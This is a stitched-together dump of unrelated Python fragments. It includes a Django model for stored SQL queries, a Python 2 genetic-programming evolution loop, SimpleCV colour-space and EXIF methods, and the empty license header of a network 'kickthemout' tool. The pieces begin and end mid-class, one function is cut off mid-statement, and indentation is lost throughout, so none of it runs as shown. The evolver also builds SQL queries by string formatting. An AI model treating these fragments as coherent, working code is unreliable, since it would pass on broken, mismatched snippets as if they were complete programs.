FREQ_QUARTERLY = 4
FREQ_ANNUALLY = 5
_FREQ_CHOICES = (
(FREQ_DAILY, "Daily"),
(FREQ_WEEKLY, "Weekly"),
(FREQ_MONTHLY, "Monthly"),
(FREQ_QUARTERLY, "Quarterly"),
(FREQ_ANNUALLY, "Annually"),
)
name = models.CharField(max_length=255)
database = models.ForeignKey(Database, on_delete=models.CASCADE)
query = models.TextField()
frequency = models.IntegerField(choices=_FREQ_CHOICES)
reviewed = models.BooleanField(default=False)
data_grid_enabled = models.BooleanField(
default=False,
help_text="Allow users to filter, sort and export data from within the browser",
)
class Meta:
verbose_name = "SQL Query"
verbose_name_plural = "SQL Queries"
def __str__(self):
return f"{self.dataset.name}: {self.name}"
def get_absolute_url(self):
return reverse("datasets:dataset_query_download", args=(self.dataset_id, self.id))
def get_preview_url(self):
return reverse("datasets:data_cut_query_preview", args=(self.dataset_id, self.id))
def show_column_filter(self):
return True
def can_show_link_for_user(self, user):
if user.is_superuser:
return True
return self.reviewed
@property
def type(self):
return DataLinkType.CUSTOM_QUERY
def get_data_last_updated_date(self):
tables = CustomDatasetQueryTable.objects.filter(query=self)
if tables:
return get_earliest_tables_last_updated_date(
self.database.memorable_name,
tuple((table.schema, table.table) for table in tables),
)
return None
def user_can_preview(self, user):
return self.dataset.user_has_access(user) and (self.reviewed or user.is_superuser)
def get_preview_data(self):
from dataworkspace.apps.core.utils import ( # pylint: disable=cyclic-import,import-outside-toplevel
get_random_data_sample,
)
database_name = self.database.memorable_name
columns = datasets_db.get_columns(database_name, query=self.query)
records = []
sample_size = settings.DATASET_PREVIEW_NUM_OF_ROWS
if columns:
rows = get_random_data_sample(
self.database.memorable_name,
sql.SQL(self.query),
sample_size,
)
for row in rows:
record_data = {}
for i, column in enumerate(columns):
record_data[column] = row[i]
records.append(record_data)
return columns, records
def get_grid_data_url(self):
return reverse("datasets:custom_dataset_query_data", args=(self.dataset_id, self.id))
@property
def cleaned_query(self):
# Replace any single '%' with '%%'
return re.sub("(?<!%)%(?!%)", "%%", self.query).rstrip().rstrip(";")
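# Editor's note: the substitution above doubles lone percent signs so that
# psycopg2-style placeholder parsing does not misread them, while leaving
# already-escaped "%%" untouched. Hedged examples (using the `re` module
# already imported in this file):
#
#     clean = lambda q: re.sub("(?<!%)%(?!%)", "%%", q).rstrip().rstrip(";")
#     assert clean("SELECT '100%';") == "SELECT '100%%'"
#     assert clean("SELECT '100%%'") == "SELECT '100%%'"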
def get_data_grid_query(self):
return sql.SQL(self.cleaned_query)
def get_column_config(self):
"""
Return column configuration for the query in the format expected by ag-grid.
"""
col_defs = []
for column in datasets_db.get_columns(
self.database.memorable_name,
query=self.cleaned_query,
include_types=True,
):
col_defs.append(
{
"field": column[0],
"filter": True,
"sortable": True,
"dataType": GRID_DATA_TYPE_MAP.get(column[1], column[1]),
}
)
return col_defs
@property
def data_grid_download_enabled(self):
return True
@property
def data_grid_download_limit(self):
return None
def get_column_details_url(self):
return reverse(
"datasets:custom_query_column_details",
args=(self.dataset_id, self.id),
)
def get_chart_builder_url(self):
return reverse(
"charts:create-chart-from-data-cut-query",
args=(self.id,),
)
def get_chart_builder_query(self):
return self.query
class CustomDatasetQueryTable(models.Model):
query = models.ForeignKey(CustomDatasetQuery, on_delete=models.CASCADE, related_name="tables")
table = models.CharField(
max_length=1024,
blank=False,
validators=[RegexValidator(regex=r"^[a-zA-Z][a-zA-Z0-9_\.]*$")],
)
schema = models.CharField(
max_length=1024,
blank=False,
validators=[RegexValidator(regex=r"^[a-zA-Z][a-zA-Z0-9_\.]*$")],
default="public",
)
class ReferenceDataset(DeletableTimestampedUserModel):
SORT_DIR_ASC = 1
SORT_DIR_DESC = 2
_SORT_DIR_CHOICES = ((SORT_DIR_ASC, "Ascending"), (SORT_DIR_DESC, "Descending"))
uuid = models.UUIDField(default=uuid.uuid4, editable=False)
<filename>src/evolver.py
"""
evolver
=======
This module contains the methods to start and finish a complete evolutionary run.
The present version can run strongly-typed Koza-based GP using tournament
selection.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
@author: <NAME>
@version: 1.00
@copyright: (c) 2009 <NAME> under the mit license
http://www.opensource.org/licenses/mit-license.html
@contact: <EMAIL>
"""
import settings
import timeit
import selection
import buildtree
import cPickle
import marshal
import pprint
#import shelve
import evalfitness
#from pysqlite2 import dbapi2 as sqlite
from sqlite3 import dbapi2 as sqlite
import crossutil
import math
import writepop
import copy
import mutation
#import psyco
import crossover
import os
#psyco.profile()
# Exceptions related to operator probability
class CrossoverProbError(Exception): pass
class MutationProbError(Exception): pass
class OperatorProbError(Exception): pass
# Exceptions related to population size
class PopSizeError(Exception): pass
def EvolutionRun(popsize,root_node,mindepth,maxdepth,buildmethod,max_nb_runs, fitness_criterion ,crossover_prob,mutation_prob,size, prob_selection,dbname,verbose):
"""
Function: EvolutionRun
=======================
The highest level function of the package.
It starts an evolutionary run with given parameters, and gives indications of
what is found after each generation.
@param popsize: size of the population
@param root_node: specify the root node and its arity (nb of children). e.g. (0,2,'root')
@param mindepth: min tree depth (at the moment only 2 working)
@param maxdepth: max depth of trees in new generation (should be >=3)
@param buildmethod: which Koza method is used to build the trees (either
'AddHalfNode' or 'AddFullNode' or 'AddGrowNodeMin' respectively for
Ramped Half-n-Half, Full, or Half)
@param max_nb_runs: the search will go on until a maximum number of generations
is reached
@param fitness_criterion: the search will stop if the fitness found is <= to
the ideal fitness
@param crossover_prob: probability of crossover (will determine what proportion of
the population will be replaced by crossover-generated offsprings)
@param mutation_prob: probability of mutation (will determine what proportion of
the population will be replaced by mutation-generated offsprings)
@param size: tournament size used by the tournament selection
@param prob_selection: probability of selecting the fittest of a tournament
@param dbname: path to database e.g. r'D:\3d_work\pythongp\pySTGP_0.51\src\pop_db'
@param verbose: print the best tree of each generation
"""
try:
os.remove(dbname)
except:
pass
current_best_fitness=float('inf')
tablenames=[]
#build the intial population of random trees at generation 0
tablenames.append('tab0')
writepop.WriteInitialPopulation2DB(popsize,root_node,mindepth,maxdepth,buildmethod,dbname,tablenames[0])
# get best fitness
db_list=selection.GetDBKeysAndFitness(dbname,tablenames[0])
chosen_one=selection.SelectDBOneFittest(db_list)
current_best_fitness=chosen_one[1]
print ''.join(['generation 0 (db table name = tab0): -> best fit individual has id:',`chosen_one[0]`,' and fitness:',`current_best_fitness`])
if verbose==True:
#writepop.GetPopStatFromDB(dbname,tablenames[0])
con = sqlite.connect(dbname)
SELECT = "select tree from %s where o_id=%d" % (tablenames[0],chosen_one[0])
cur = con.cursor()
cur.execute(SELECT)
con.commit()
myresult= cur.fetchone()
con.close()
best_tree=copy.deepcopy(marshal.loads(myresult[0]))
print best_tree
if current_best_fitness<=fitness_criterion:
print ''.join(['found solution: generation 0, db_id:',`chosen_one[0]`,' and fitness:',`current_best_fitness`])
else:
# evolve the population for max_nb_runs
i=1
while i<max_nb_runs and current_best_fitness>fitness_criterion:
tablenames.append(''.join(['tab',`i`]))
TournamentSelectionEvolveDBPopulation2(popsize,maxdepth,crossover_prob,mutation_prob,size, prob_selection,dbname,tablenames[i-1],tablenames[i])
db_list=selection.GetDBKeysAndFitness(dbname,tablenames[i])
chosen_one=selection.SelectDBOneFittest(db_list)
current_best_fitness=chosen_one[1]
print ''.join(['generation ',`i`,' (db table name = tab',`i`,'): -> best fit individual has id:',`chosen_one[0]`,' and fitness:',`current_best_fitness`])
if verbose==True:
#writepop.GetPopStatFromDB(dbname,tablenames[i])
con = sqlite.connect(dbname)
SELECT = "select tree from %s where o_id=%d" % (tablenames[i],chosen_one[0])
cur = con.cursor()
cur.execute(SELECT)
con.commit()
myresult= cur.fetchone()
con.close()
best_tree=copy.deepcopy(marshal.loads(myresult[0]))
print best_tree
i=i+1
else:
if current_best_fitness<=fitness_criterion:
print ''.join(['found solution at generation ',`i-1`,', with fitness:',`current_best_fitness`])
writepop.PrintPopFromDB(dbname,tablenames[i-1],'lastpop')
else:
print ''.join(['Fitness stopping criterion not found. Run ended at generation ',`i`])
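# A minimal usage sketch (argument values are illustrative assumptions, not
# taken from the original package; adjust them to your own problem setup):
def _example_evolution_run():
    EvolutionRun(popsize=200, root_node=(0, 2, 'root'), mindepth=2, maxdepth=8,
                 buildmethod='AddHalfNode', max_nb_runs=50, fitness_criterion=0.1,
                 crossover_prob=0.7, mutation_prob=0.2, size=7,
                 prob_selection=0.8, dbname='pop_db', verbose=True)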
def TournamentSelectionEvolveDBPopulation2(popsize,maxdepth,crossover_prob,mutation_prob,size, prob_selection,dbname,tablename,tablename2):
"""
Function: TournamentSelectionEvolveDBPopulation2
=================================================
create a new population of randomly generated trees and write this new generation
to a new table of name 'tab'+generation number in the database.
@param popsize: size of the population
@param maxdepth: max depth of trees in new generation
@param crossover_prob: probability of crossover (will determine what proportion of
the population will be replaced by crossover-generated offsprings)
@param mutation_prob: probability of mutation (will determine what proportion of
the population will be replaced by mutation-generated offsprings)
@param dbname: path to database e.g. r'D:\3d_work\pythongp\pySTGP_0.51\src\pop_db'
@param tablename: name of the database table of the initial population
@param tablename2: name of the database table of the next generation
"""
if crossover_prob>1 or crossover_prob<0:
    raise CrossoverProbError, "Crossover Probability should be in interval [0,1]"
if mutation_prob>1 or mutation_prob<0:
    raise MutationProbError, "Mutation Probability should be in interval [0,1]"
reproduction_prob= 1-(crossover_prob+mutation_prob)
if reproduction_prob>1 or reproduction_prob<0:
    raise OperatorProbError, "Sum of Mutation and Crossover Probability should be in interval [0,1]"
if popsize<3:
    raise PopSizeError, "The size of the population must be at least 3"
new_pop=[]
trees=[]
# build the appropriate size for the crossover offsprings,
# mutation offsprings and reproduction offsprings
crossover_size= math.ceil(popsize*crossover_prob)
mutation_size= math.ceil(popsize*mutation_prob)
reproduction_size= math.ceil(popsize*reproduction_prob)
sizes=[crossover_size,mutation_size,reproduction_size]
theoretical_size=sum(sizes)
if theoretical_size >popsize:
    # math.ceil can overshoot popsize by up to 2, so trim the excess
    # from whichever offspring group is largest
    nb=theoretical_size-popsize
    if crossover_size>mutation_size and mutation_size>=reproduction_size:
        crossover_size=crossover_size-nb
    elif mutation_size>crossover_size and crossover_size>=reproduction_size:
        mutation_size=mutation_size-nb
    elif reproduction_size>crossover_size and crossover_size>=mutation_size:
        reproduction_size=reproduction_size-nb
    else:
        crossover_size=crossover_size-nb
#print crossover_size
#print mutation_size
#print reproduction_size
# get the ordered list of fitnesses with identifier keys
db_list=selection.GetDBKeysAndFitness(dbname,tablename)
# start by selecting fittest parents for reproduction
reprod=selection.SelectDBSeveralFittest(int(reproduction_size), db_list)
#print reprod
# then select parents for crossover
cross=selection.TournamentSelectDBSeveral(int(crossover_size),size, prob_selection,db_list)
#print cross
# then select parents for mutation
mut=selection.TournamentSelectDBSeveral(int(mutation_size),size, prob_selection,db_list)
#print mut
#open database
con = sqlite.connect(dbname)
#add to new population these reproduced offsprings
#writepop.ClearDBTable(dbname,tablename2)
#con.execute("create table %s(o_id INTEGER PRIMARY KEY,tree TEXT,\
# tree_mapping TEXT, treedepth INTEGER, evaluated INTEGER, fitness FLOAT)"%tablename2)
# apply reproduction operator and copy to new population database
for elem in reprod:
o_id=elem[0]
#print o_id
SELECT = "select tree, tree_mapping, treedepth, evaluated, fitness from %s where o_id=%d" % (tablename,o_id)
cur = con.cursor()
cur.execute(SELECT)
con.commit()
myresult= cur.fetchone()
my_tree=copy.deepcopy(marshal.loads(myresult[0]))
my_tree_mapping=copy.deepcopy(marshal.loads(myresult[1]))
my_treedepth=myresult[2]
my_evaluated=myresult[3]
my_fitness=myresult[4]
# write a copy of the selected parent in the new database
new_pop.append((o_id,my_tree, my_tree_mapping,my_treedepth,my_evaluated,my_fitness))
trees.append(my_tree)
#con.execute("insert into %s(o_id,tree,tree_mapping,treedepth,evaluated,fitness) values (NULL,?,?,?,?,?)"%tablename2,(buffer(marshal.dumps(myresult[0],-1)),buffer(marshal.dumps(myresult[1],-1)),my_treedepth,my_evaluated,my_fitness))
con.commit()
# apply mutation operator and copy to new population database
for elem in mut:
o_id=elem[0]
#print o_id
SELECT = "select tree, tree_mapping, treedepth, evaluated, fitness from %s where o_id=%d" % (tablename,o_id)
cur = con.cursor()
cur.execute(SELECT)
con.commit()
myresult= cur.fetchone()
my_tree=copy.deepcopy(marshal.loads(myresult[0]))
my_tree_mapping=copy.deepcopy(marshal.loads(myresult[1]))
my_treedepth=myresult[2]
my_evaluated=myresult[3]
my_fitness=myresult[4]
same_tree=True
mt=mutation.Mutate(maxdepth,my_tree,my_tree_mapping,my_treedepth)
same_tree=mt[0]
if mt[1] in trees:
    same_tree=True
# make sure to try another mutation if the offspring is identical to the parent
if same_tree==True:
while same_tree==True:
mt=mutation.Mutate(maxdepth,my_tree,my_tree_mapping,my_treedepth)
same_tree=mt[0]
mt_map=crossutil.GetIndicesMappingFromTree(mt[1])
mt_depth=crossutil.GetDepthFromIndicesMapping(mt_map)
mt_evaluated=1
# get fitness of the tree
result_fitness=settings.FitnessFunction(mt[1])
#mt_fitness=evalfitness.EvalTreeForAllInputSets(mt[1],xrange(settings.nb_eval))
#mt_fitness=evalfitness.EvalTreeForOneListInputSet(mt[1])
#result_fitness=evalfitness.FinalFitness(mt_fitness)
#result_fitness=evalfitness.FinalFitness2(mt_fitness)
#result_fitness=evalfitness.FinalFitness3(mt_fitness)
#result_fitness=evalfitness.FinalFitness4(mt_fitness)
#print result_fitness
# write a copy of the selected parent in the new database
new_pop.append((o_id,mt[1], mt_map,mt_depth,mt_evaluated,result_fitness))
#con.execute("insert into %s(o_id,tree,tree_mapping,treedepth,evaluated,fitness) values (NULL,?,?,?,?,?)"%tablename2,(buffer(marshal.dumps(mt[1],-1)),buffer(marshal.dumps(mt_map,-1)),mt_depth,mt_evaluated,result_fitness))
con.commit()
# apply crossover operator and copy to new population database
for elem in cross:
# select the second parent using tournament selection
parent2=selection.TournamentSelectDBSeveral(2,7, 0.8,db_list)
# make sure parent2 is different from parent1
if elem==parent2[0]:
elem2=parent2[1]
else:
elem2=parent2[0]
o_id=elem[0]
o_id2=elem2[0]
#print o_id
#print o_id2
cur = con.cursor()
SELECT1 = "select tree, tree_mapping, treedepth, evaluated, fitness from %s where o_id=%d" % (tablename,o_id)
cur.execute(SELECT1)
con.commit()
myresult1= cur.fetchone()
SELECT2 = "select tree, tree_mapping, treedepth, evaluated, fitness from %s where o_id=%d" % (tablename,o_id2)
cur.execute(SELECT2)
con.commit()
myresult2= cur.fetchone()
my_tree1=copy.deepcopy(marshal.loads(myresult1[0]))
my_tree1_mapping=copy.deepcopy(marshal.loads(myresult1[1]))
my_tree1depth=myresult1[2]
my_evaluated1=myresult1[3]
my_fitness1=myresult1[4]
my_tree2=copy.deepcopy(marshal.loads(myresult2[0]))
my_tree2_mapping=copy.deepcopy(marshal.loads(myresult2[1]))
my_tree2depth=myresult2[2]
my_evaluated2=myresult2[3]
my_fitness2=myresult2[4]
#cs=crossover.Koza1PointCrossover(maxdepth,my_tree1,my_tree2,my_tree1_mapping,my_tree2_mapping,my_tree1depth,my_tree2depth)
#print cs
#cs=mutation.Mutate(maxdepth,my_tree,my_tree_mapping,my_treedepth)
cs_evaluated=1
# get fitness of the tree
input_sets=xrange(settings.nb_eval)
cs=[[0,0,0,0]]
i=0
while cs[0]!=[1,1,1,1] and i<100 :
#cp_my_tree1=copy.deepcopy(marshal.loads(myresult1[0]))
#cp_my_tree1_mapping=copy.deepcopy(marshal.loads(myresult1[1]))
#cp_my_tree2=copy.deepcopy(marshal.loads(myresult2[0]))
#cp_my_tree2_mapping=copy.deepcopy(marshal.loads(myresult2[1]))
cp_my_tree1=marshal.loads(myresult1[0])
cp_my_tree1_mapping=marshal.loads(myresult1[1])
cp_my_tree2=marshal.loads(myresult2[0])
cp_my_tree2_mapping=marshal.loads(myresult2[1])
cs=crossover.Koza1PointCrossover(maxdepth,cp_my_tree1,cp_my_tree2,cp_my_tree1_mapping,cp_my_tree2_mapping,my_tree1depth,my_tree2depth)
#trees.append(cs[1])
#trees.append(cs[2])
i=i+1
#print cs[1]
#print cs[2]
# if after trying 100 times the crossover cannot give a correct offspring,
# then create a new offspring using mutation...
if cs[0]!=[1,1,1,1] and settings.Substitute_Mutation==1:
mt=mutation.Mutate(maxdepth,cp_my_tree1,cp_my_tree1_mapping,my_tree1depth)
mt_map=crossutil.GetIndicesMappingFromTree(mt[1])
mt_depth=crossutil.GetDepthFromIndicesMapping(mt_map)
mt_evaluated=1
# get fitness of the tree
result_fitness=settings.FitnessFunction(mt[1])
new_pop.append((o_id,mt[1], mt_map,mt_depth,mt_evaluated,result_fitness))
else:
try:
offspring1_result_fitness=settings.FitnessFunction(cs[1])
#cs_offspring1_fitness=evalfitness.EvalTreeForAllInputSets(cs[1],input_sets)
#cs_offspring1_fitness=evalfitness.EvalTreeForOneListInputSet(cs[1])
except:
print 'pb when applying fitness function to results of crossover'
print cs[1]
print cs[0]
try:
offspring2_result_fitness=settings.FitnessFunction(cs[2])
#cs_offspring1_fitness=evalfitness.EvalTreeForAllInputSets(cs[1],input_sets)
#cs_offspring1_fitness=evalfitness.EvalTreeForOneListInputSet(cs[1])
except:
print 'pb when applying fitness function to results of crossover'
print cs[2]
print cs[0]
#try:
# cs_offspring2_fitness=evalfitness.EvalTreeForAllInputSets(cs[2],input_sets)
#cs_offspring2_fitness=evalfitness.EvalTreeForOneListInputSet(cs[2])
#except:
# print cs[2]
# print cs[0]
#offspring1_result_fitness=evalfitness.FinalFitness(cs_offspring1_fitness)
#offspring2_result_fitness=evalfitness.FinalFitness(cs_offspring2_fitness)
#offspring1_result_fitness=evalfitness.FinalFitness2(cs_offspring1_fitness)
#offspring2_result_fitness=evalfitness.FinalFitness2(cs_offspring2_fitness)
#offspring1_result_fitness=evalfitness.FinalFitness3(cs_offspring1_fitness)
#offspring2_result_fitness=evalfitness.FinalFitness3(cs_offspring2_fitness)
#offspring1_result_fitness=evalfitness.FinalFitness4(cs_offspring1_fitness)
#offspring2_result_fitness=evalfitness.FinalFitness4(cs_offspring2_fitness)
#print result_fitness
# write a copy of the selected parent in the new database
if offspring1_result_fitness>=offspring2_result_fitness:
cs_map=crossutil.GetIndicesMappingFromTree(cs[1])
cs_depth=crossutil.GetDepthFromIndicesMapping(cs_map)
#con.execute("insert into %s(o_id,tree,tree_mapping,treedepth,evaluated,fitness) values (NULL,?,?,?,?,?)"%tablename2,(buffer(marshal.dumps(cs[1],-1)),buffer(marshal.dumps(cs_map,-1)),cs_depth,cs_evaluated,offspring1_result_fitness))
new_pop.append((o_id,cs[1], cs_map,cs_depth,cs_evaluated,offspring1_result_fitness))
#trees.append(cs[1])
if offspring1_result_fitness<offspring2_result_fitness:
cs_map=crossutil.GetIndicesMappingFromTree(cs[2])
cs_depth=crossutil.GetDepthFromIndicesMapping(cs_map)
#con.execute("insert into %s(o_id,tree,tree_mapping,treedepth,evaluated,fitness) values | |
destructor.
"""
try :
for i in self._tempFiles:
if (isinstance(i,str)):
os.remove(i)
except :
pass
def getEXIFData(self):
"""
**SUMMARY**
This function extracts the exif data from an image file like JPEG or TIFF. The data is returned as a dict.
**RETURNS**
A dictionary of key value pairs. The value pairs are defined in the EXIF.py file.
**EXAMPLE**
>>> img = Image("./SimpleCV/sampleimages/OWS.jpg")
>>> data = img.getEXIFData()
>>> data['Image GPSInfo'].values
**NOTES**
* Compliments of: http://exif-py.sourceforge.net/
* See also: http://en.wikipedia.org/wiki/Exchangeable_image_file_format
**See Also**
:py:class:`EXIF`
"""
import os, string
if( self.filename is None or len(self.filename) < 5 ):
    #skip the warning here; filenames are often absent in image sets
#logger.warning("ImageClass.getEXIFData: This image did not come from a file, can't get EXIF data.")
return {}
fileName, fileExtension = os.path.splitext(self.filename)
fileExtension = string.lower(fileExtension)
if( fileExtension != '.jpeg' and fileExtension != '.jpg' and
    fileExtension != '.tiff' and fileExtension != '.tif'):
#logger.warning("ImageClass.getEXIFData: This image format does not support EXIF")
return {}
raw = open(self.filename,'rb')
data = process_file(raw)
return data
def live(self):
"""
**SUMMARY**
This shows a live view of the camera.
* Left click will show mouse coordinates and color.
* Right click will kill the live image.
**RETURNS**
Nothing. In place method.
**EXAMPLE**
>>> cam = Camera()
>>> cam.live()
"""
start_time = time.time()
from SimpleCV.Display import Display
i = self
d = Display(i.size())
i.save(d)
col = Color.RED
while d.isNotDone():
i = self
i.clearLayers()
elapsed_time = time.time() - start_time
if d.mouseLeft:
txt = "coord: (" + str(d.mouseX) + "," + str(d.mouseY) + ")"
i.dl().text(txt, (10,i.height / 2), color=col)
txt = "color: " + str(i.getPixel(d.mouseX,d.mouseY))
i.dl().text(txt, (10,(i.height / 2) + 10), color=col)
print "coord: (" + str(d.mouseX) + "," + str(d.mouseY) + "), color: " + str(i.getPixel(d.mouseX,d.mouseY))
if elapsed_time > 0 and elapsed_time < 5:
i.dl().text("In live mode", (10,10), color=col)
i.dl().text("Left click will show mouse coordinates and color", (10,20), color=col)
i.dl().text("Right click will kill the live image", (10,30), color=col)
i.save(d)
if d.mouseRight:
print "Closing Window"
d.done = True
pg.quit()
def getColorSpace(self):
"""
**SUMMARY**
Returns the value matched in the color space class
**RETURNS**
Integer corresponding to the color space.
**EXAMPLE**
>>> if(image.getColorSpace() == ColorSpace.RGB)
**SEE ALSO**
:py:class:`ColorSpace`
"""
return self._colorSpace
def isRGB(self):
"""
**SUMMARY**
Returns true if this image uses the RGB colorspace.
**RETURNS**
True if the image uses the RGB colorspace, False otherwise.
**EXAMPLE**
>>> if( img.isRGB() ):
>>> r,g,b = img.splitChannels()
**SEE ALSO**
:py:meth:`toRGB`
"""
return(self._colorSpace==ColorSpace.RGB)
def isBGR(self):
"""
**SUMMARY**
Returns true if this image uses the BGR colorspace.
**RETURNS**
True if the image uses the BGR colorspace, False otherwise.
**EXAMPLE**
>>> if( img.isBGR() ):
>>> b,g,r = img.splitChannels()
**SEE ALSO**
:py:meth:`toBGR`
"""
return(self._colorSpace==ColorSpace.BGR)
def isHSV(self):
"""
**SUMMARY**
Returns true if this image uses the HSV colorspace.
**RETURNS**
True if the image uses the HSV colorspace, False otherwise.
**EXAMPLE**
>>> if( img.isHSV() ):
>>> h,s,v = img.splitChannels()
**SEE ALSO**
:py:meth:`toHSV`
"""
return(self._colorSpace==ColorSpace.HSV)
def isHLS(self):
"""
**SUMMARY**
Returns true if this image uses the HLS colorspace.
**RETURNS**
True if the image uses the HLS colorspace, False otherwise.
**EXAMPLE**
>>> if( img.isHLS() ):
>>> h,l,s = img.splitChannels()
**SEE ALSO**
:py:meth:`toHLS`
"""
return(self._colorSpace==ColorSpace.HLS)
def isXYZ(self):
"""
**SUMMARY**
Returns true if this image uses the XYZ colorspace.
**RETURNS**
True if the image uses the XYZ colorspace, False otherwise.
**EXAMPLE**
>>> if( img.isXYZ() ):
>>> x,y,z = img.splitChannels()
**SEE ALSO**
:py:meth:`toXYZ`
"""
return(self._colorSpace==ColorSpace.XYZ)
def isGray(self):
"""
**SUMMARY**
Returns true if this image uses the Gray colorspace.
**RETURNS**
True if the image uses the Gray colorspace, False otherwise.
**EXAMPLE**
>>> if( img.isGray() ):
>>> print "The image is in Grayscale."
**SEE ALSO**
:py:meth:`toGray`
"""
return(self._colorSpace==ColorSpace.GRAY)
def isYCrCb(self):
"""
**SUMMARY**
Returns true if this image uses the YCrCb colorspace.
**RETURNS**
True if the image uses the YCrCb colorspace, False otherwise.
**EXAMPLE**
>>> if( img.isYCrCb() ):
>>> Y,Cr,Cb = img.splitChannels()
**SEE ALSO**
:py:meth:`toYCrCb`
"""
return(self._colorSpace==ColorSpace.YCrCb)
def toRGB(self):
"""
**SUMMARY**
This method attempts to convert the image to the RGB colorspace.
If the color space is unknown we assume it is in the BGR format.
**RETURNS**
Returns the converted image if the conversion was successful,
otherwise None is returned.
**EXAMPLE**
>>> img = Image("lenna")
>>> RGBImg = img.toRGB()
**SEE ALSO**
:py:meth:`isRGB`
"""
retVal = self.getEmpty()
if( self._colorSpace == ColorSpace.BGR or
self._colorSpace == ColorSpace.UNKNOWN ):
cv.CvtColor(self.getBitmap(), retVal, cv.CV_BGR2RGB)
elif( self._colorSpace == ColorSpace.HSV ):
cv.CvtColor(self.getBitmap(), retVal, cv.CV_HSV2RGB)
elif( self._colorSpace == ColorSpace.HLS ):
cv.CvtColor(self.getBitmap(), retVal, cv.CV_HLS2RGB)
elif( self._colorSpace == ColorSpace.XYZ ):
cv.CvtColor(self.getBitmap(), retVal, cv.CV_XYZ2RGB)
elif( self._colorSpace == ColorSpace.YCrCb ):
cv.CvtColor(self.getBitmap(), retVal, cv.CV_YCrCb2RGB)
elif( self._colorSpace == ColorSpace.RGB ):
retVal = self.getBitmap()
else:
logger.warning("Image.toRGB: There is no supported conversion to RGB colorspace")
return None
return Image(retVal, colorSpace=ColorSpace.RGB )
def toBGR(self):
"""
**SUMMARY**
This method attempts to convert the image to the BGR colorspace.
If the color space is unknown we assume it is in the BGR format.
**RETURNS**
Returns the converted image if the conversion was successful,
otherwise None is returned.
**EXAMPLE**
>>> img = Image("lenna")
>>> BGRImg = img.toBGR()
**SEE ALSO**
:py:meth:`isBGR`
"""
retVal = self.getEmpty()
if( self._colorSpace == ColorSpace.RGB or
self._colorSpace == ColorSpace.UNKNOWN ):
cv.CvtColor(self.getBitmap(), retVal, cv.CV_RGB2BGR)
elif( self._colorSpace == ColorSpace.HSV ):
cv.CvtColor(self.getBitmap(), retVal, cv.CV_HSV2BGR)
elif( self._colorSpace == ColorSpace.HLS ):
cv.CvtColor(self.getBitmap(), retVal, cv.CV_HLS2BGR)
elif( self._colorSpace == ColorSpace.XYZ ):
cv.CvtColor(self.getBitmap(), retVal, cv.CV_XYZ2BGR)
elif( self._colorSpace == ColorSpace.YCrCb ):
cv.CvtColor(self.getBitmap(), retVal, cv.CV_YCrCb2BGR)
elif( self._colorSpace == ColorSpace.BGR ):
retVal = self.getBitmap()
else:
logger.warning("Image.toBGR: There is no supported conversion to BGR colorspace")
return None
return Image(retVal, colorSpace = ColorSpace.BGR )
def toHLS(self):
"""
**SUMMARY**
This method attempts to convert the image to the HLS colorspace.
If the color space is unknown we assume it is in the BGR format.
**RETURNS**
Returns the converted image if the conversion was successful,
otherwise None is returned.
**EXAMPLE**
>>> img = Image("lenna")
>>> HLSImg = img.toHLS()
**SEE ALSO**
:py:meth:`isHLS`
"""
retVal = self.getEmpty()
if( self._colorSpace == ColorSpace.BGR or
self._colorSpace == ColorSpace.UNKNOWN ):
cv.CvtColor(self.getBitmap(), retVal, cv.CV_BGR2HLS)
elif( self._colorSpace == ColorSpace.RGB):
cv.CvtColor(self.getBitmap(), retVal, cv.CV_RGB2HLS)
elif( self._colorSpace == ColorSpace.HSV ):
cv.CvtColor(self.getBitmap(), retVal, cv.CV_HSV2RGB)
cv.CvtColor(retVal, retVal, cv.CV_RGB2HLS)
elif( self._colorSpace == ColorSpace.XYZ ):
cv.CvtColor(self.getBitmap(), retVal, cv.CV_XYZ2RGB)
cv.CvtColor(retVal, retVal, cv.CV_RGB2HLS)
elif( self._colorSpace == ColorSpace.YCrCb ):
cv.CvtColor(self.getBitmap(), retVal, cv.CV_YCrCb2RGB)
cv.CvtColor(retVal, retVal, cv.CV_RGB2HLS)
elif( self._colorSpace == ColorSpace.HLS ):
retVal = self.getBitmap()
else:
logger.warning("Image.toHSL: There is no supported conversion to HSL colorspace")
return None
return Image(retVal, colorSpace = ColorSpace.HLS )
def toHSV(self):
"""
**SUMMARY**
This method attempts to convert the image to the HSV colorspace.
If the color space is unknown we assume it is in the BGR format
**RETURNS**
Returns the converted image if the conversion was successful,
otherwise None is returned.
**EXAMPLE**
>>> img = Image("lenna")
>>> HSVImg = img.toHSV()
**SEE ALSO**
:py:meth:`isHSV`
"""
retVal = self.getEmpty()
if( self._colorSpace == ColorSpace.BGR or
self._colorSpace == ColorSpace.UNKNOWN ):
cv.CvtColor(self.getBitmap(), retVal, cv.CV_BGR2HSV)
elif( self._colorSpace == ColorSpace.RGB):
cv.CvtColor(self.getBitmap(), retVal, cv.CV_RGB2HSV)
elif( self._colorSpace == ColorSpace.HLS ):
cv.CvtColor(self.getBitmap(), retVal, cv.CV_HLS2RGB)
cv.CvtColor(retVal, retVal, cv.CV_RGB2HSV)
elif( self._colorSpace == ColorSpace.XYZ ):
cv.CvtColor(self.getBitmap(), retVal, cv.CV_XYZ2RGB)
cv.CvtColor(retVal, retVal, cv.CV_RGB2HSV)
elif( self._colorSpace == ColorSpace.YCrCb ):
cv.CvtColor(self.getBitmap(), retVal, cv.CV_YCrCb2RGB)
cv.CvtColor(retVal, retVal, cv.CV_RGB2HSV)
elif( self._colorSpace == ColorSpace.HSV ):
retVal = self.getBitmap()
else:
logger.warning("Image.toHSV: There is no supported conversion to HSV colorspace")
return None
return Image(retVal, colorSpace = ColorSpace.HSV )
def toXYZ(self):
"""
**SUMMARY**
This method attempts to convert the image to the XYZ colorspace.
If the color space is unknown we assume it is in the BGR format.
#!/usr/bin/env python3
# -.- coding: utf-8 -.-
# kickthemout.py
"""
Copyright (C) 2017-18 <NAME> (<EMAIL>) & <NAME> (<EMAIL>)
See License at nikolaskama.me (https://nikolaskama.me/kickthemoutproject)
"""
